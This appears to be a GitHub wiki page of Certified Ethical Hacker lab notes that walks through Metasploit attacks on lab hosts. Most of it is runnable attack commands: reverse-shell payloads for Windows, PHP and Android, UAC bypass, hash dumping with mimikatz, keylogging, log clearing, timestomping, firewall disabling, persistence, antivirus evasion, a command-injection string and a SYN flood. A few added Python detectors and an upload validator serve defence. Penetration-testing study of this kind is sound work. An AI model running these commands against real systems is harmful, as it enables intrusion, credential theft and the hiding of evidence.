CEH_Metasploit - yenbohuang/techNotes GitHub Wiki

Metasploit:

Common steps to initialize Metasploit

sudo su
service postgresql start
msfconsole
db_status
exit

# Init DB
msfdb init
service postgresql restart
msfconsole
db_status

# Save scan result to "Test" and import to DB
nmap -Pn -sS -A -oX Test 10.10.1.0/24
db_import Test

General commands

| Command | Note |
|---|---|
| hosts | List the hosts imported from the nmap report. |
| services | List the services on the detected hosts, imported from the nmap report. |
| search portscan | Search modules. |
| back | Return to the msf command line. |
| hosts -R | Automatically set RHOSTS to the discovered hosts present in the database (imported from the nmap report). |

Network Scanning

SYN scan:

use auxiliary/scanner/portscan/syn
set INTERFACE eth0
set PORTS 80
set RHOSTS 10.10.1.5-23
set THREADS 50
run

TCP scan for open ports:

use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.1.22
run

Enumeration

Check the Windows version (or the Samba version on Linux):

use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.1.5-23
set THREADS 11
run

System Hacking

| Command | Note |
|---|---|
| /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 11900 | Generate a unique (non-repeating) pattern of 11900 bytes. |
| /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 11900 -q 386F4337 | Find the offset of the value 386F4337 (as read from a register) within that pattern. |
| /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb | Convert assembly language into hex opcodes. |
| msfvenom -p windows/shell_reverse_tcp LHOST=[Local IP Address] LPORT=[Listening Port] EXITFUNC=thread -f c -a x86 -b "\x00" | Generate Windows shellcode in C format, avoiding the null byte. |
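To understand the number that pattern_offset.rb prints, it helps to see how the pattern is built: triples of upper-case letter, lower-case letter and digit, cycled in that order, so any four consecutive bytes occur only once in the first 20280 bytes. The code below is an added reimplementation for study, not the Metasploit tool itself; it shows why `-q 386F4337` (the register value 0x386F4337, which is the bytes "7Co8" in little-endian memory order) resolves to offset 2003:

```python
"""Reimplementation of the cyclic pattern behind pattern_create.rb and
pattern_offset.rb, so the offsets the tools report can be checked by hand.

Added example; not the Metasploit tool's own code. Lengths above 20280 bytes
are not cycled here (the real tool wraps around)."""
import string

UPPER, LOWER, DIGIT = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length):
    """Return the first `length` bytes of the pattern Aa0Aa1Aa2...Ab0Ab1..."""
    chunks = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                chunks.append(u + l + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(query, length):
    """Locate `query` in the pattern of the given length.

    An 8-character hex string is treated the way pattern_offset.rb -q treats
    it: as a 32-bit little-endian value read from a register, so the bytes are
    reversed before searching. Returns the offset, or None if not present."""
    if len(query) == 8 and all(c in string.hexdigits for c in query):
        needle = bytes.fromhex(query)[::-1].decode("ascii")
    else:
        needle = query
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


if __name__ == "__main__":
    print(pattern_create(24))                 # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7
    print(pattern_offset("386F4337", 11900))  # 2003
```

The offset is the position of the first byte that overwrote the register, which is how the value lines up with the crashing input.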

General steps

Create shikata encoder (Polymorphic XOR Additive Feedback Encoder)

# Create a malicious Windows executable file.
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" \
  LHOST=10.10.1.13 -f exe > /home/attacker/Desktop/<malicious file>

# Run Metasploit
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
show options
exploit -j -z

# Start up Apache HTTPD and share/download/run <malicious file> on Windows.
cp /home/attacker/Desktop/<malicious file> /var/www/html/share/

# Back to Metasploit and launch Meterpreter shell
sessions -i 1

Create reverse TCP backdoor

# Generate reverse TCP backdoor
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/<malicious file>

# Launch Metasploit
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.1.13
set lport 444
run

# Share it via httpd and download/run it on Windows 11
cp /home/attacker/Desktop/<malicious file> /var/www/html/share/

# Check target system information
sysinfo
getuid

Bypass Windows UAC protection via the FodHelper Registry Key

# Background the current session.
background

# Bypass Windows UAC protection via the FodHelper Registry Key
use exploit/windows/local/bypassuac_fodhelper

# 1 is the current Meterpreter session which is running in the background.
set session 1

# Check if the settings are correct:
show options

set LHOST 10.10.1.13

# 0 is the exploit target ID (the default target), not a "null" value.
set TARGET 0
exploit

# Elevate privileges
getsystem -t 1
getuid

Windows 11

Exploit Client-Side Vulnerabilities and Establish a VNC Session

# Generate payload
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=10.10.1.13 \
  LPORT=444 -o /home/attacker/Desktop/Test.exe

# Start up Apache httpd for sharing "Test.exe" to Windows.
cp /home/attacker/Desktop/Test.exe /var/www/html/share/

# Enter Metasploit console:
msfconsole

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 444
exploit

# Visit `http://10.10.1.13/share` and download/run `Test.exe` on Windows.

# If the Meterpreter shell is not automatically connected to the session:
sessions -i 1

# After we have a tunnel to Windows, check if we have access:
sysinfo

upload /root/PowerSploit/Privesc/PowerUp.ps1 PowerUp.ps1
shell

# "PowerUp.ps1" is under "c:\Users\Admin\Downloads"
powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1;Invoke-AllChecks"

# Revert to the Meterpreter session.
exit

# Exploit VNC vulnerability and access VNC
run vnc

Escalate Privileges using Privilege Escalation Tools and Exploit Client-Side Vulnerabilities

# Follow "General step: Create shikata encoder" and deploy malicious file called "Exploit.exe".

# Check user ID
getuid

# Copy the "BeRoot" folder from Windows 11 "e:\CEH-Tools\CEHv12\Module 06 System Hacking\Privilege Escalation Tools\BeRoot" to the Parrot Security "Desktop" folder.

upload /home/attacker/Desktop/BeRoot/beRoot.exe
shell

# Display information about service names along with their permissions, keys, writable directories, locations, and other vital data.
beRoot.exe

# Copy "Seatbelt.exe" from Windows 11 "e:\CEH-Tools\CEHv12\Module 06 System Hacking\Github Tools\" to the Parrot Security "Desktop" folder.

upload /home/attacker/Desktop/Seatbelt.exe
shell

# Gather information about AMSIProviders, AntiVirus, AppLocker etc.
Seatbelt.exe -group=system

# Gather information about ChromiumPresence, CloudCredentials, CloudSyncProviders, CredEnum, dir, DpapiMasterKeys etc.
Seatbelt.exe -group=user

# Gather information about ChromiumBookmarks, ChromiumHistory, ExplicitLogonEvents, FileInfo etc.
Seatbelt.exe -group=misc
exit

# Follow "General step: Bypass Windows UAC protection via the FodHelper Registry Key"
# Check if the settings are correct at "show options" step:
# EXITFUNC -> process
# LPORT -> 4444

# Extract the NTLM hashes
run post/windows/gather/smart_hashdump

# Clear the event logs
clearev

Hack a Windows Machine using Metasploit and Perform Post-Exploitation using Meterpreter

# Prepare "C:\Users\Admin\Downloads\Secret.txt" with secret content on Windows 11.

# Follow "General step: Create shikata encoder" and deploy malicious file called "Backdoor.exe".
# Make sure that both the "Backdoor.exe" and "Secret.txt" files are stored in the same directory (here, "Downloads").

# Collect target system information
sysinfo
ipconfig
getuid
pwd
ls
cat Secret.txt

# Change the MACE (modified, accessed, created, entry) attributes.
# Modified (-m), Accessed (-a), Created (-c), and Entry Modified (-e).
timestomp Secret.txt -v
timestomp Secret.txt -m "02/11/2018 08:10:03"
timestomp Secret.txt -v
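Two properties of this change are what forensic tooling keys on: timestomp rewrites the $STANDARD_INFORMATION timestamps but not the $FILE_NAME copies that NTFS keeps in the same MFT record, and the values it writes have no sub-second part. The checker below is an added example (not part of these notes or of Metasploit) that applies both heuristics to constructed timeline records; the first record mirrors the `-m "02/11/2018 08:10:03"` command above applied to a file created in 2023:

```python
"""Heuristics for spotting timestomped files in an NTFS timeline export.

Meterpreter's timestomp rewrites $STANDARD_INFORMATION ($SI) timestamps but
not the $FILE_NAME ($FN) timestamps, and writes whole-second values.
Added example; SAMPLE_RECORDS is constructed, not taken from a real image."""
from datetime import datetime

# Constructed sample: ISO-8601 $SI and $FN timestamps per file.
SAMPLE_RECORDS = [
    {   # Looks like `timestomp Secret.txt -m "02/11/2018 08:10:03"` on a 2023 file.
        "name": "Secret.txt",
        "si": {"modified": "2018-02-11T08:10:03.000000",
               "accessed": "2023-09-01T10:22:41.512338",
               "created":  "2023-09-01T10:22:41.512338"},
        "fn": {"modified": "2023-09-01T10:22:41.512338",
               "accessed": "2023-09-01T10:22:41.512338",
               "created":  "2023-09-01T10:22:41.512338"},
    },
    {   # Untouched file: $SI never precedes $FN created and keeps sub-second precision.
        "name": "notes.txt",
        "si": {"modified": "2023-09-02T09:15:07.204511",
               "accessed": "2023-09-02T09:15:07.204511",
               "created":  "2023-09-01T11:00:00.887120"},
        "fn": {"modified": "2023-09-01T11:00:00.887120",
               "accessed": "2023-09-01T11:00:00.887120",
               "created":  "2023-09-01T11:00:00.887120"},
    },
]


def timestomp_indicators(record):
    """Return human-readable indicators for one MFT record (empty list if none)."""
    fn_created = datetime.fromisoformat(record["fn"]["created"])
    findings = []
    for field in ("modified", "accessed", "created"):
        t = datetime.fromisoformat(record["si"][field])
        if t.microsecond == 0:
            findings.append(f"$SI {field} has a zero sub-second part")
        if t < fn_created:
            findings.append(f"$SI {field} predates $FN created")
    return findings


def scan(records):
    """Map file name -> indicators, for records that have at least one."""
    result = {}
    for r in records:
        hits = timestomp_indicators(r)
        if hits:
            result[r["name"]] = hits
    return result


if __name__ == "__main__":
    for name, hits in scan(SAMPLE_RECORDS).items():
        print(name)
        for h in hits:
            print("  -", h)
```

Both signals are indicators rather than proof: files extracted from ZIP archives or copied from FAT media also carry whole-second timestamps, and $FN timestamps are refreshed when a file is moved or renamed, so corroborate with the USN journal or other sources before concluding.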

# Changing directories
cd
pwd
cd C:/
pwd

# Locate files
search -f pagefile.sys

# key-logging
keyscan_start

# Log in to Windows, start a text editor, and type something. Then go back to Parrot Security.

# Dump all captured keystrokes
keyscan_dump

# Check user's idle time
idletime

# Open a shell in meterpreter
shell

# Retrieve the directory names with hidden attributes
dir /a:h

# List all the available services
sc queryex type=service state=all

# Check firewall
netsh firewall show state
netsh firewall show config

# Check installed software
wmic /node:"" product get name,version,vendor

# Check processor’s details
wmic cpu get

# Retrieve login names and SIDs
wmic useraccount get name,sid

# Reboot the target system
wmic os where Primary='TRUE' reboot

# Start/stop network service
net stop
net start

# Turn off firewall service
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off

# Retrieve all log files
findstr /E ".log" > log.txt

Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys

# Follow "General step: Create reverse TCP backdoor" and deploy malicious file called "Windows.exe".

# Follow "General step: Bypass Windows UAC protection via the FodHelper Registry Key"

# Background the current session.
background

# Exploit the sticky keys feature
use post/windows/manage/sticky_keys

# List the sessions in msfconsole.
sessions -l

# Set the privileged session as the current session
set session 2
exploit

# Log in with a non-admin account on Windows and press the Shift key 5 times.
# This will open a command prompt on the lock screen with System privileges.
# Use whoami in command console and check if this is Windows system account.

Escalate Privileges to Gather Hashdump using Mimikatz

# Follow "General step: Create reverse TCP backdoor" and deploy malicious file called "backdoor.exe".

# Follow "General step: Bypass Windows UAC protection via the FodHelper Registry Key"

# Load mimikatz
load kiwi
help kiwi

# Dump the NTLM hashes of all users
lsa_dump_sam

# View the LSA secrets (login hashes)
# NTLM hash of Admin is "92937945b518814341de3f726500d4ff".
lsa_dump_secrets

# Change the password of Admin
password_change -u Admin -n <NTLM hash of Admin acquired in previous step> -P <New Password>

# Check that the change succeeded
lsa_dump_sam

# Log in to Windows 11 with the Admin account and the new password. Remember to change the password back for the next lab task.

Maintain Persistence by Abusing Boot or Logon Autostart Execution

# Follow "General step: Create reverse TCP backdoor" and deploy malicious file called "exploit.exe".

# Follow "General step: Bypass Windows UAC protection via the FodHelper Registry Key"

# Follow "General step: Create reverse TCP backdoor" and deploy a malicious file called "backdoor.exe" with "lport=8080".
# Do not log in to Windows 11 to download/run "payload.exe"; instead, upload "payload.exe" to the Windows startup folder
# with the "upload" command in this msfconsole.
cd "C:\\ProgramData\\Start Menu\\Programs\\Startup"
pwd
upload /home/attacker/payload.exe

# Switch to Windows 11 and reboot. The backdoor reconnects every time Windows 11 is rebooted.

Perform a DoS Attack (SYN Flooding) on a Target Host using Metasploit

# check victim
nmap -p 21 10.10.1.11

# attack
msfconsole
use auxiliary/dos/tcp/synflood
show options

set RPORT 21

# Target IP Address
set RHOST 10.10.1.11

# Spoofable IP Address
set SHOST 10.10.1.19

exploit
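From the defender's side the flood above shows up as a burst of SYNs to 10.10.1.11:21 that never complete the handshake, all apparently from the SHOST address. The detector below is an added example (not part of Metasploit or of these notes) that computes a handshake completion ratio per target port over constructed packet summaries and reports the top source:

```python
"""Half-open connection ratio detector for a SYN flood such as the one
auxiliary/dos/tcp/synflood sends.

Added example with constructed events; not part of Metasploit or of these
notes. Events are (src, dst, dport, tcp_flags) for packets sent towards the
server, "S" = SYN only, "A" = ACK only."""
from collections import defaultdict


def build_sample_events():
    """Constructed traffic: three normal FTP clients, one HTTP client, then a flood."""
    events = []
    for src in ("10.10.1.5", "10.10.1.6", "10.10.1.7"):
        events.append((src, "10.10.1.11", 21, "S"))
        events.append((src, "10.10.1.11", 21, "A"))   # completes the handshake
    events.append(("10.10.1.5", "10.10.1.11", 80, "S"))
    events.append(("10.10.1.5", "10.10.1.11", 80, "A"))
    # 50 SYNs carrying the spoofed source 10.10.1.19 that are never acknowledged.
    events.extend([("10.10.1.19", "10.10.1.11", 21, "S")] * 50)
    return events


def detect_syn_flood(events, syn_threshold=20, max_completion_ratio=0.2):
    """Alert on (dst, dport) pairs with many SYNs and few completed handshakes."""
    syn_count = defaultdict(int)                       # (dst, dport) -> SYN packets
    syn_by_src = defaultdict(lambda: defaultdict(int))  # (dst, dport) -> src -> SYNs
    saw_syn, saw_ack = set(), set()                    # (src, dst, dport) tuples
    for src, dst, dport, flags in events:
        if flags == "S":
            syn_count[(dst, dport)] += 1
            syn_by_src[(dst, dport)][src] += 1
            saw_syn.add((src, dst, dport))
        elif flags == "A":
            saw_ack.add((src, dst, dport))
    alerts = []
    for (dst, dport), n in syn_count.items():
        completed = sum(1 for (s, d, p) in saw_syn & saw_ack if (d, p) == (dst, dport))
        ratio = completed / n
        if n >= syn_threshold and ratio < max_completion_ratio:
            top_src, top_n = max(syn_by_src[(dst, dport)].items(), key=lambda kv: kv[1])
            alerts.append({"target": f"{dst}:{dport}", "syns": n,
                           "completion_ratio": round(ratio, 3),
                           "top_source": top_src, "top_source_syns": top_n})
    return alerts


if __name__ == "__main__":
    for alert in detect_syn_flood(build_sample_events()):
        print(alert)
```

Because SHOST is spoofed, the "top source" is whatever address the attacker chose and may belong to an uninvolved host, so the response should be SYN cookies or rate limiting at the edge rather than blocking that address.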

Windows Server 2019

Privilege Escalation and Maintain Persistence using WMI

# Follow "General step: Create reverse TCP backdoor" and deploy TWO malicious files called "Payload.exe" and "wmi.exe".
# Run "Payload.exe" on Windows Server 2019 first and keep "wmi.exe" for WMI persistence.

# Deploy "Wmi-Persistence"
upload /home/attacker/Wmi-Persistence-master C:\\Users\\Administrator\\Downloads
load powershell
powershell_shell
Import-Module "C:\Users\Administrator\Downloads\WMI-Persistence.ps1"
Install-Persistence -Trigger Startup -Payload "C:\Users\Administrator\Downloads\wmi.exe"

# Run in another window with root privilege
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 444
exploit

# Go back to the previous window, press "ctrl + c" and exit PowerShell.
# Reboot Windows Server 2019. After a couple of minutes, a meterpreter session is opened.

Windows Server 2022

Maintain Domain Persistence by Exploiting Active Directory Objects

https://github.com/PowerShellEmpire/PowerTools

# Follow "General step: Create reverse TCP backdoor" and deploy malicious file called "Exploit.exe".

# Grant a standard user rights on the AdminSDHolder object and then add the user to the Domain Admins group, to maintain persistence in the domain

upload -r /home/attacker/PowerTools-master C:\\Users\\Administrator\\Downloads
shell
cd C:\Windows\System32
powershell
cd C:\Users\Administrator\Downloads\PowerView
Import-Module ./powerview.psm1

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName Martin -Verbose -Rights All

# Check "ActiveDirectoryRights: GenericAll"
Get-ObjectAcl -SamAccountName "Martin" -ResolveGUIDs

# Reduce the time interval of SDProp to 3 minutes
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /V AdminSDProtectFrequency /T REG_DWORD /F /D 300

# Add Martin to Domain Admins group
net group "Domain Admins" Martin /add /domain

# Other PowerView commands
Get-ADDomain
Get-NetDomain
Get-DomainPolicy
Get-NetDomainController
Get-NetUser
Get-NetComputer
Get-NetGroup
Invoke-ShareFinder -Verbose
Get-NetForest
Get-NetGPO
Get-NetGPO | select displayname

# Users with modification rights for a group
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}

Evading IDS, Firewalls, and Honeypots

Bypass Antivirus using Metasploit Templates

Compare Windows.exe and bypass.exe on VirusTotal: fewer engines detect bypass.exe.

msfvenom -p windows/shell_reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Windows.exe

# Change the size to 4000 in the template source code
pluma /usr/share/metasploit-framework/data/templates/src/pe/exe/template.c

cd /usr/share/metasploit-framework/data/templates/src/pe/exe/
i686-w64-mingw32-gcc template.c -lws2_32 -o evasion.exe

msfvenom -p windows/shell_reverse_tcp lhost=10.10.1.13 lport=444 -x /usr/share/metasploit-framework/data/templates/src/pe/exe/evasion.exe -f exe > /home/attacker/bypass.exe

Bypass Firewall through Windows BITSAdmin

  • Run in Parrot Security:
    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Exploit.exe
    # Start httpd and share it at http://10.10.1.13/share/Exploit.exe
  • Turn on the Windows Server 2019 firewall.
  • Run in PowerShell:
    bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exe
  • We can see that Exploit.exe is still transferred by BITSAdmin.

Hacking Web Applications

Exploit a File Upload Vulnerability at Different Security Levels

# Generate payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f raw

# Save the generated payload (PHP script) to "upload.php".
# Log in to DVWA on Windows Server 2022: http://10.10.1.22:8080/dvwa/login.php
# Set the DVWA security level to "Low", then upload the file via the "File Upload" web page.

msfconsole

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 4444
run

# Visit http://10.10.1.22:8080/dvwa/hackable/uploads/upload.php
# This will execute the uploaded payload.

# Switch back to Metasploit and view the system details of the victim machine.
sysinfo

Repeat the steps but:

  • Add "GIF98" to the first line in payload and save the payload as "high.jpeg".
  • Downgrade DVWA security level to "high", then, upload the file by "File Upload" web page.
  • Visit the DVWA "Command Injection" web page, then enter the following line in the "Enter an IP address" input box:
|copy C:\wamp64\www\DVWA\hackable\uploads\high.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php
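The "high" level passes because the check only looks at the extension and the leading bytes, and the file is then stored under the web root with its name intact. A server-side validator that closes those gaps is shown below as an added example (not DVWA code); the sample uploads are constructed, with "high.jpeg" modelled on the bypass file described above:

```python
"""Server-side upload validation of the kind DVWA's 'high' level lacks:
extension allow-list, magic bytes that must match the extension, a scan for
script markers anywhere in the body, and a server-chosen storage name.

Added example, not DVWA code; SAMPLES are constructed."""
import os
import secrets

# Extension -> acceptable leading bytes for that image type.
ALLOWED = {
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}
# Markers that have no business inside an image file (compared case-insensitively).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")

SAMPLES = {
    # The bypass from the notes: fake "GIF98" header in front of a PHP script, named .jpeg.
    "high.jpeg": b"GIF98\n<?php /* constructed stand-in for the uploaded PHP script */ ?>",
    # Genuine GIF magic with PHP appended (a polyglot).
    "polyglot.gif": b"GIF89a\x01\x00\x01\x00<?php echo 1; ?>",
    # Plain JPEG-looking bytes.
    "photo.jpeg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
    "shell.php": b"<?php echo 1; ?>",
}


def validate_upload(filename, data):
    """Return (True, storage_name) or (False, reason).

    The storage name never reuses the client's filename, so a later rename
    trick has nothing to target; store it outside the served directory."""
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, f"magic bytes do not match {ext}"
    body = data.lower()
    if any(marker in body for marker in SCRIPT_MARKERS):
        return False, "embedded script content"
    return True, secrets.token_hex(8) + ext


if __name__ == "__main__":
    for name, content in SAMPLES.items():
        print(name, "->", validate_upload(name, content))
```

The `copy ... shell.php` step in the notes succeeds regardless of upload checks because the command-injection page executes it, so the uploads directory must also be configured not to execute scripts, and the injection itself fixed.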

Hacking Mobile Platforms

service postgresql start

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.1.13 R > Desktop/Backdoor.apk

# start HTTPD and share Backdoor.apk
cp /root/Desktop/Backdoor.apk /var/www/html/share

msfconsole

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 10.10.1.13
show options
exploit -j -z

# Download Backdoor.apk in Android Emulator and install it.

sessions -i 1

sysinfo
ipconfig
pwd
cd /sdcard
pwd
ps